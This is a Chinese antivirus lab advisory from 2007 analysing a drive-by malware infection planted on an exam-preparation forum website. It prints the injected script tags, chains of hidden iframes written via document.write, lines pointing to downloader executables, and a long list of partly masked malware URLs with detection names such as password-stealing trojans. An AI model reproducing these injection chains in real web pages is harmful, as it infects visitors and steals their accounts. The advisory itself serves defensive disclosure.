安全响应·Security
病毒预警·Alarm

人大考研论坛网站挂马事件

出处:安天实验室 2007-12-04 15:00

内容:
 

  12月4日,安天实验室反病毒监测网发现,人大考研论坛网站(http://www.
rendaka****.cn)被黑客植入病毒,用户如果访问该网站,会被病毒感染。系统就
会自动从恶意网站上下载并运行多个恶意程序,盗取用户信息。
  
  该网站的主页里被插入如下代码:

 

  插入代码:
  <script src=http://sns***.com/pic></script><script   src=http://taoz****.com/pic></script>
  <script src=http://zzs***.cn/reg></script>

  1. http://sns***.com/pic地址失效
  2. http://zzs***.cn/reg 地址失效
  3. http://taoz****.com/pic插入框架代码:
  document.write("<div style='display:none'>")
  document.write("<iframe src=
  http://51la.wss****.com/31/5xx.htm?3></iframe>")
  document.write("<iframe src=
  http://www.foa***.info/ms44.htm?6326></iframe>")
  document.write("<iframe src=
  http://aa.lls****.com/ww/new05.htm?067?4></iframe>")
  document.write("<iframe src=
  http://www.900***.info/xm30.htm?258></iframe>")
  document.write("<iframe src=
  http://www.taozh***.com/pic/vd.htm></iframe>")
  document.write("<iframe   src=http://aa.llsg***.com/ww/new263.htm?id=015></iframe>")
  document.write("</div>")

  (1). http://51la.wss****.com/31/5xx.htm?3插入框架代码:

 

  <iframe src=http://qqq.wss****.com/gm.htm width=100 height=0></iframe>
  (1).http://qqq.wss****.com/gm.htm加密网马代码:

 

  下载文件: http://qqq.aishe****.com/down.exe

  (2).http://www.foa***.info/ms44.htm?6326框架代码:

 
  
  <iframe src="88/***.htm" width="20" height="0"
  frameborder="0"></iframe>

  <iframe src="88/***.htm" width="1" height="1"
  frameborder="0"></iframe>

  <iframe src="88/***.htm" width="100" height="0"
  frameborder="0"></iframe>

  (1).88/881.htm关键脚本代码:
    document.writeln("Cuteqq=\'
    http:\/\/60.190.101.***\/cd22.exe\';");
    下载文件: http://60.190.101.***/cd22.exe
  (2).88/***.htm加密网马代码:
  
     
  (3).88/***.htm脚本代码:

 

  <script language=javascript src=bb.js></script>
  
  bb.js关键脚本代码:
  document.writeln("document.write
  (\'<iframe width=100 height=100   src=\"http:\/\/www.foa***.info\/88\/bf.htm\"><\/iframe>\');");
  连接地址为:http://www.foa***.info/88/bf.htm
  http://www.foa***.info/88/bf.htm加密网马代码
  
 
  
  (3).http://aa.llsg****.com/ww/new05.htm?067?4框架代码:
  
 

  <iframe src=http://aa.lls****.com/aa/haha.htm
  width=5 height=5></iframe>
  <iframe src=http://aa.lls****.com/aa/pps.htm
  width=5 height=5></iframe>
  (1). http://aa.lls****.com/aa/haha.htm加密网马,
  下载http://down.lls****.com/bb/014.exe
  (2). http://aa.lls****.com/aa/pps.htm加密网马代码:
  
 
  
  (4).http://www.900***.info/xm30.htm?258框架代码:
  
 
  
  <iframe src="ee/***.htm" width="20" height="0"
  frameborder="0"></iframe>
  <iframe src="ee/***.htm" width="0" height="0"
  frameborder="0"></iframe>
  <iframe src="ee/***.htm" width="100" height="0"
  frameborder="0"></iframe>
  (1).ee/ee1.htm关键脚本代码:
  document.writeln("Cuteqq=\'http:\/\/60.190.101.***\/cd22.exe\';");
  下载文件: http://60.190.101.***/cd22.exe
  (2).ee/ee3.htm加密网马代码:
  
 
    
  (3).ee/***.htm脚本代码:
  <script language=javascript src=bb.js></script>
  
  bb.js关键脚本代码:
  document.writeln("document.write(\'<iframe width=100
  height=100 src=\"http:\/\/www.900***.info\/ee\/bf.htm\">
  <\/iframe>\');

  连接地址为:http://www.900***.info/ee/bf.htm
        http://www.900***.info/ee/bf.htm加密网马代码:
  
 
   
  (5).http://aa.lls****.com/ww/new263.htm?id=015框架代码:
  
 
  
  <iframe src=http://aa.lls****.com/aa/haha.htm
  width=5 height=5></iframe>
  <iframe src=http://aa.lls****.com/aa/pps.htm
  width=5 height=5></iframe>

  (1). http://aa.lls****.com/aa/haha.htm
  加密网马:下载http://down.lls****.com/bb/014.exe
  (2). http://aa.lls****.com/aa/pps.htm加密网马代码:
  
 
  
  当用户访问http://www.rendaka****.cn时, 会调用以上恶意代码!
  使系统自动下载以下文件到本地,并运行。

  http://qqq.aishe****.com/down.exe
  病毒名(Worm.Win32.Downloader.bw) 蠕虫下载者
  
  http://60.190.101.***/cd22.exe
  病毒名(Worm.Win32.Downloader.bi) 蠕虫下载者
  
  http://down.lls****.com/bb/014.exe
  病毒名(Worm.Win32.Downloader.as) 蠕虫下载者
  
  下在成功运行木马将下载以下病毒到用户的系统,并运行。

  http://67.43.156.**/down/0.exe 地址失效
  http://67.43.156.**/down/1.exe 地址失效
  http://67.43.156.**/down/2.exe 地址失效
  http://67.43.156.**/down/3.exe 地址失效
  http://67.43.156.**/down/4.exe 地址失效
  
  http://67.43.156.**/down/5.exe 地址失效
  http://67.43.156.**/down/6.exe 地址失效
  http://67.43.156.**/down/7.exe 地址失效
  http://205.209.142.***/down/8.exe 地址失效
  http://205.209.142.***/down/9.exe 地址失效

  http://205.209.142.***/down/10.exe
  病毒名(Trojan-PSW.Win32.OnLineGames.jes) 盗号木马
  http://205.209.142.***/down/11.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jiz) 盗号木马
  http://205.209.142.***/down/13.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jgq) 盗号木马
  http://205.209.142.***/down/14.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jlc) 盗号木马
  
  http://205.209.142.***/down/15.exe 地址失效
  http://205.209.142.***/down/16.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jes) 盗号木马
  http://205.209.142.***/down/17.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jer) 盗号木马
  http://205.209.142.***/down/**.exe
  病毒名( Virus.Win32.AutoRun.aii) 感染运行病毒
  
  http://205.209.142.***/down/20.exe 地址失效
  http://205.209.142.***/down/21.exe 地址失效
  http://205.209.142.***/down/22.exe 地址失效
  http://205.209.142.***/down/24.exe 地址失效
  http://205.209.142.***/down/25.exe 地址失效
  
  http://205.209.142.***/down/26.exe 地址失效
  http://60.190.101.***/aa1.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.ixl) 盗号木马
  http://60.190.101.***/aa2.exe 地址失效
  http://60.190.101.***/aa3.exe 地址失效
  
  http://60.190.101.***/aa4.exe 地址失效
  http://60.190.101.***/aa5.exe 地址失效
  http://60.190.101.***/aa6.exe 地址失效
  http://60.190.101.***/aa7.exe 地址失效
  http://60.190.101.***/aa8.exe 地址失效
  
  http://60.190.101.***/aa9.exe 地址失效
  http://60.190.101.***/aa10.exe 地址失效
  http://60.190.101.***/aa11.exe 地址失效
  http://60.190.101.***/aa12.exe 地址失效
  http://60.190.101.***/aa13.exe 地址失效
  
  http://60.190.101.***/aa14.exe 地址失效
  http://60.190.101.***/aa15.exe 地址失效
  http://60.190.101.***/aa16.exe 地址失效
  http://60.190.101.***/aa17.exe 地址失效
  http://60.190.101.***/aa**.exe 地址失效
  
  http://60.190.101.***/aa19.exe 地址失效
  http://60.190.101.***/aa20.exe 地址失效
  http://60.190.101.***/aa21.exe 地址失效
  http://60.190.101.***/aa22.exe 地址失效
  http://60.190.101.***/aa23.exe 地址失效
  
  http://60.190.101.***/aa24.exe 地址失效
  http://60.190.101.***/aa25.exe 地址失效
  http://qqq.dzy***.com/wm/wm/1.exe
  病毒名( Trojan-Dropper.Win32.Small.bbz) 辅助木马
  http://qqq.dzy***.com/wm/wm/2.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jbj) 盗号木马

  http://qqq.dzy***.com/wm/wm/3.exe 地址失效
  http://qqq.dzy***.com/wm/wm/4.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jfk) 盗号木马
  http://qqq.dzy***.com/wm/wm/5.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jjj) 盗号木马
  http://qqq.dzy***.com/wm/wm/6.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jbm) 盗号木马

  http://qqq.dzy***.com/wm/wm/7.exe
  病毒名( Trojan-PSW.Win32.Lmir.bpe) 盗号木马
  http://qqq.dzy***.com/wm/wm/8.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jmi) 盗号木马
  http://qqq.dzy***.com/wm/wm/9.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.ixn) 盗号木马
  
  http://qqq.dzy***.com/wm/wm/10.exe 地址失效
  http://qqq.dzy***.com/wm/wm/11.exe 地址失效
  http://qqq.dzy***.com/wm/wm/12.exe 地址失效
  http://qqq.dzy***.com/wm/wm/13.exe 地址失效
  http://qqq.dzy***.com/wm/wm/14.exe 地址失效
  
  http://qqq.dzy***.com/wm/wm/15.exe 地址失效
  http://qqq.dzy***.com/wm/wm/16.exe 地址失效
  http://qqq.dzy***.com/wm/wm/17.exe 地址失效
  http://qqq.dzy***.com/wm/wm/**.exe 地址失效
  http://qqq.dzy***.com/wm/wm/19.exe
  病毒名( Trojan-Downloader.Win32.Cryptic.ic) 下载者木马
  http://qqq.dzy***.com/wm/wm/20.exe 地址失效

附:
 

点击此处下载木马防线2005+

病毒上报信箱: submit@virusview.net
[TOP]